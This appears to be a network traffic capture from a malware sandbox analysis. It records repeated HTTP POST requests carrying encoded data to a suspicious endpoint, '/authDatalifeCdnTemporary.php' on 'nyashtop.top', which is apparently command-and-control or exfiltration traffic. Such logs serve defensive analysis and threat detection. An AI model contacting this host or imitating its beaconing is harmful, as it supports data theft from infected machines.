Jan 13, 2025 13:11:02.017219067 CET	540	OUT	Data Raw: 5f 59 5b 56 54 48 54 54 5a 5d 56 56 52 5e 50 5e 50 5c 55 54 57 57 5a 5b 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _Y[VTHTTZ]VVR^P^P\UTWWZ[T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#^83625%U?@)?_3;>U';)<V'!2_<)^'W8).'F!.\*9
Jan 13, 2025 13:11:02.284584999 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:02.415986061 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:02.599447966 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue
Jan 13, 2025 13:11:02.955255985 CET	2580	OUT	Data Raw: 5a 5e 5e 56 54 47 54 55 5a 5d 56 56 52 5a 50 53 50 58 55 5f 57 54 5a 5e 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: Z^^VTGTUZ]VVRZPSPXU_WTZ^T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#\,6 !527+)#Y%(0>>/$1=)90(Z).'F!.\*)
Jan 13, 2025 13:11:03.346184015 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:03.373569965 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:04.698750973 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:11:05.048432112 CET	2580	OUT	Data Raw: 5f 5d 5b 52 54 48 51 54 5a 5d 56 56 52 5e 50 5e 50 5a 55 5e 57 55 5a 5f 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _][RTHQTZ]VVR^P^PZU^WUZ_T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#.#"52=$07D):4$^%3X?)P'-):8&2<[?'F!.\9
Jan 13, 2025 13:11:05.328721046 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:05.457614899 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:06.506820917 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:11:06.860945940 CET	2580	OUT	Data Raw: 5a 58 5b 5e 51 45 54 50 5a 5d 56 56 52 5e 50 5f 50 51 55 58 57 53 5a 57 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: ZX[^QETPZ]VVR^P_PQUXWSZWT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#Z.#!&&+B>:#$+$.(:'2($$2$]?'F!.\*9
Jan 13, 2025 13:11:07.140785933 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:07.316591024 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:07.213102102 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2000 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:11:07.564022064 CET	2000	OUT	Data Raw: 5a 55 5b 56 54 43 54 55 5a 5d 56 56 52 5e 50 5c 50 5f 55 55 57 54 5a 5e 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: ZU[VTCTUZ]VVR^P\P_UUWTZ^T[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\ 8\"T)&3+:(0(%.R)'$"._+(Y3!;('F!.\9
Jan 13, 2025 13:11:07.870402098 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:08.007178068 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 22 0c 2a 0b 3e 1c 24 39 34 53 3b 2c 35 01 3a 12 0e 04 3e 21 38 5d 29 2a 13 5f 2c 2e 34 5d 3c 2b 3f 03 2b 31 23 0f 25 36 24 54 3d 39 2b 51 07 11 3a 06 24 2e 31 06 2b 0d 04 5e 30 54 26 41 22 20 3c 5d 29 2a 22 1b 27 01 27 0c 28 28 26 05 3e 0a 3a 13 25 29 03 42 28 12 21 06 28 3d 2f 5e 08 12 25 53 3d 0f 3a 0f 32 30 3f 5c 35 06 20 17 3e 3f 03 53 36 3f 39 0a 3e 3a 0f 5e 30 07 35 58 30 58 26 1e 31 54 3b 0d 32 22 08 01 27 39 24 50 2f 0f 2c 51 0c 3d 5a 57 Data Ascii: ">$94S;,5:>!8])_,.4]<+?+1#%6$T=9+Q:$.1+^0T&A" <])*"''((&>:%)B(!(=/^%S=:20?\5 >?S6?9>:^05X0X&1T;2"'9$P/,Q=ZW

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:07.581180096 CET	285	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue Connection: Keep-Alive
Jan 13, 2025 13:11:07.939181089 CET	2580	OUT	Data Raw: 5f 58 5e 55 51 47 54 52 5a 5d 56 56 52 5f 50 52 50 51 55 5c 57 51 5a 57 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: _X^UQGTRZ]VVR_PRPQU\WQZWT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\#_/&!2%>#%8=$ >$&"(8';).'F!.\*
Jan 13, 2025 13:11:08.218811989 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:08.351461887 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:11:09.191195011 CET	261	OUT	POST /authDatalifeCdnTemporary.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 519600cl.nyashtop.top Content-Length: 2580 Expect: 100-continue
Jan 13, 2025 13:11:09.548377991 CET	2580	OUT	Data Raw: 5a 5b 5b 53 51 40 54 52 5a 5d 56 56 52 5f 50 53 50 59 55 5d 57 5f 5a 59 54 5b 43 56 50 5f 56 5d 42 5a 56 50 55 50 57 56 59 57 52 50 52 5b 54 51 51 5d 43 59 5d 58 58 5a 50 56 54 5e 5a 53 50 44 5c 52 5e 5d 50 5c 54 55 59 59 5b 54 41 59 5a 5a 51 56 Data Ascii: Z[[SQ@TRZ]VVR_PSPYU]W_ZYT[CVP_V]BZVPUPWVYWRPR[TQQ]CY]XXZPVT^ZSPD\R^]P\TUYY[TAYZZQVP\^\[BP\PYB_UY^_ZSTQ[RXWAZ\^[ZQ]^UZ]]SQ[[^YRC__^XY[^[Q[TZZZY^SUUPYYTY^C\_ZUZP]]YZ\UPTW_GQ_[XVRZC___[Z\ .3"":_204=\7\%("U0>(:&1>[)9$1+?'F!.\*
Jan 13, 2025 13:11:09.819888115 CET	25	IN	HTTP/1.1 100 Continue
Jan 13, 2025 13:11:10.055645943 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ
Jan 13, 2025 13:11:10.055660963 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 13 Jan 2025 12:11:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 58 5a Data Ascii: >]XZ